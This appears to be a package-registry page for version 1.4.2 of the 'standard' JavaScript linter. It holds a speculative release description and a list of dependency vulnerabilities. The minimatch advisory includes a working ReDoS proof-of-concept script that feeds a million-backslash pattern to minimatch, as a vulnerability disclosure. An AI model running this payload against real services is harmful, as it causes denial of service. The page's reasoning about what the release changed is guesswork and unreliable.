Standard version 1.4.2 is a minor patch release following closely on the heels of version 1.4.1 for the popular JavaScript Standard Style linter and code formatter. Both versions, designed to enforce a consistent coding style in JavaScript projects, share the same core dependencies: glob for file matching, jscs for code style checks, split for stream processing, jshint for general JavaScript linting, find-root to locate the project root, and minimatch for advanced file matching. This indicates no fundamental changes to the underlying linting and formatting rules or the tools used to enforce them between these two releases.
Essentially, both versions offer developers a straightforward way to automatically format and check their JavaScript code against the widely adopted Standard Style, promoting code consistency and readability across teams and projects. This eliminates stylistic debates and streamlines collaboration. Developers benefit from automatic formatting and error detection, saving time and focusing on code logic.
The key distinction lies in their release dates. While both versions were published on January 28, 2015, version 1.4.2 was released approximately 13 minutes after 1.4.1. This very short interval suggests that version 1.4.2 likely constitutes a bug fix or a minor correction to an issue discovered immediately after the initial release of 1.4.1. For developers, upgrading from 1.4.1 to 1.4.2 is recommended to ensure they have the most stable and reliable experience with the Standard JavaScript Style, incorporating any potential fixes addressed in the subsequent release.
All the vulnerabilities related to the version 1.4.2 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.